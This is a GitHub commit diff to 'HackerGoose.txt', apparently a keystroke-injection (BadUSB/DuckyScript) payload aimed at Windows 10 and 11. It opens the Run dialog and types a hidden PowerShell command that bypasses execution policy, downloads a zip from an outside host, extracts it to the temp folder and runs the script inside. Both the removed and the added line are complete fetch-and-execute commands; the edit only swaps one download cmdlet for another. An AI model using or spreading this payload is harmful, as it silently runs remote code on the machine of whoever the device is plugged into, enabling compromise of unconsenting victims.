Update HackerGoose.txt

This commit is contained in:
I-Am-Jakoby
2023-01-01 17:05:25 -06:00
committed by GitHub
parent d16da678b9
commit 1a7158628e
+1 -1
View File
@@ -8,5 +8,5 @@ REM Target: Windows 10, 11
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"
STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"
ENTER